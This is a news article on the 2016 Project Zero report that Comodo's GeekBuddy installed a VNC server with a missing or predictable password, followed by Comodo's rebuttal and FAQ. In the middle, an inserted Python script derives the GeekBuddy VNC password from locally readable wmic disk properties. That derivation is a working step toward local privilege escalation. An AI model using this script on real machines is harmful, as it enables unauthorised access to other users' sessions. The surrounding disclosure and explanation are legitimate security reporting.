Warning: Comodo Antivirus included insecure remote tech support tool
A researcher from Google Project Zero discovered a serious security issue with the technical support tools supplied with Comodo software products. Tavis Ormandy found that Comodo Antivirus, Comodo Firewall, and Comodo Internet Security all included a bundled VNC server with either no password protection, or a very weak password.
GeekBuddy is a remote desktop tool used by support staff to troubleshoot customer problems, but it also serves as a backdoor that allows for near-unrestricted access to users' computers. The tool installs with full admin rights, meaning that an attacker could very easily gain complete control of a remote computer.
Older versions of GeekBuddy were installed with no password set, making it possible for anyone to connect to a computer remotely using nothing more than its IP address and a port number. This issue was addressed, but Ormandy found that the password used in subsequent versions is derived from attributes of the machine's own hard disk, so it can be predicted rather than guessed and offers virtually no protection. He says:
The password is simply the first 8 characters of SHA1 (Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks)
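To make concrete why a password built that way is not a secret, here is an added example (not Ormandy's code and not Comodo's) that reproduces the derivation he describes from the four `Win32_DiskDrive` properties named in the quote. Those property names and the `wmic diskdrive get ... /format:csv` command are real and need no privileges to run; the sample CSV output is constructed for this example, and the exact concatenation rules (integers rendered in decimal, no separator, UTF-8 before hashing) are assumptions, since the quote does not spell them out.

```python
import csv
import hashlib
import io

# Constructed sample of what
#   wmic diskdrive get Caption,SerialNumber,Signature,TotalTracks /format:csv
# prints on a single-disk machine (real wmic output is UTF-16 with CRLF line
# endings; this is a cleaned-up copy). The disk values are made up.
SAMPLE_WMIC_CSV = """
Node,Caption,SerialNumber,Signature,TotalTracks
DESKTOP-EXAMPLE,ST1000DM003-1CH162,Z1D4ABCD,2928446312,31008255
"""


def geekbuddy_password(caption, signature, serial_number, total_tracks):
    """Derive the password the way the quoted formula describes:
    first 8 hex characters of SHA1(Caption + Signature + SerialNumber + TotalTracks).

    ASSUMPTION: the fields are concatenated with no separator, integers are
    rendered in decimal, and the string is hashed as UTF-8. The formula itself
    is from the report; these details are not.
    """
    material = f"{caption}{signature}{serial_number}{total_tracks}"
    return hashlib.sha1(material.encode("utf-8")).hexdigest()[:8]


def derive_from_wmic_csv(text):
    """Parse wmic CSV output and return [(caption, derived_password), ...].

    Every field used here is readable by an unprivileged local user, which is
    the whole problem: anyone who can run wmic can compute the 'secret'.
    """
    reader = csv.DictReader(io.StringIO(text.strip()))
    results = []
    for row in reader:
        password = geekbuddy_password(
            row["Caption"],
            row["Signature"],
            row["SerialNumber"],
            row["TotalTracks"],
        )
        results.append((row["Caption"], password))
    return results


if __name__ == "__main__":
    for caption, password in derive_from_wmic_csv(SAMPLE_WMIC_CSV):
        print(f"{caption}: derived VNC password {password}")
```

Two things worth noting. First, the weakness is not the size of the space (8 hex characters is 32 bits) but that the input is deterministic and world-readable on the box, so no guessing is needed at all. Second, classic RFB/VNC authentication uses only the first 8 bytes of the password as a DES key, so even replacing this scheme with a long random password would not be a complete fix; the service should not be reachable by other users or over the network in the first place, and any credential should be per-session.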
Having been in communication with Comodo over the issue, Ormandy decided to go public:
Comodo Internet Security installs a VNC server with predictable password by default. https://t.co/HQXVeKgMLT ¯\_(ツ)_/¯
— Tavis Ormandy (@taviso) February 18, 2016
Comodo has now addressed the problem -- so make sure your software is up to date -- and Softpedia reports that the company has responded to the revelations:
Comodo has come out to clarify that only its support staff can connect to GeekBuddy, through special company relay servers, meaning remote attackers could not employ this flaw. On the other hand, malware that is already present on the system could use it to escalate its privileges and gain more intrusive capabilities.
Comodo has disputed the claims, saying that the reports of remote access "make no technical sense":
Recently, it was reported by Google Security that there might be a small local vulnerability in Comodo GeekBuddy that allowed a local attacker to gain another locally logged-on user’s privilege. Here is the link from Google’s Project 0. https://code.google.com/p/google-security-research/issues/detail?id=703
The minor potential vulnerability was fixed and addressed back on February 10, prior to it being made public by Google Security.
Unfortunately, in some posts and reports, it has been erroneously stated that an attacker could somehow gain access to a user’s PC through Comodo GeekBuddy and a logged in user.
We spoke with Comodo Senior Vice President of Engineering Egemen Tas on this issue.
“This makes no technical sense. It is not reasonable to expect a remote attacker to connect to your PC with GeekBuddy. First and foremost, GeekBuddy does NOT open any ports and does not accept any incoming connections. Only Comodo technical support, during specific support sessions, can connect and this connection is established through Comodo relay servers, not from a local network or from the internet.”
Mr. Tas continued:
“Second, the vulnerability reported has nothing to do with accessing a VNC server remotely, but using a VNC server to obtain another user’s privilege level — if you have access to the same PC and know the details of the password generation algorithm.”
“Third, the issue cannot be exploited remotely. The attacker has to gain local access to the PC first in order to try and do anything – and the password would need to be predictable only by skilled attackers.”
“And lastly, the minor vulnerability has been fixed and addressed back on February 10.”
In summary – all software goes through patch and fixes and this minor issue has already been fixed in GeekBuddy 4.25.380415.167 (released on February 10th) and shared with customers.
At Comodo, we always strive to protect our users, and to assist you here are some frequently asked questions on the issue. Customers can feel free to contact GeekBuddy directly at [email protected] or 866-272-9804.
What is the issue?
GeekBuddy uses a modified version of VNC to allow Comodo technicians remote access to the PCs during support sessions. In order to use VNC, a local user needs to have a password. In GeekBuddy we automatically generate the password per computer to prevent any local user access to this service.
Which GeekBuddy or CIS versions are affected?
The reported issue does not affect Comodo Internet Security (CIS). It is specifically related to GeekBuddy versions prior to Build 167. We released the hotfix on the 10th of February.
Does GeekBuddy allow remote access by anyone?
No. GeekBuddy is used for remote technical support by Comodo engineers only. It is not technically possible for anyone to connect to your PC. It does NOT open any ports at all. This issue does not allow any remote attacker to obtain any privileges. It requires local access and specific conditions.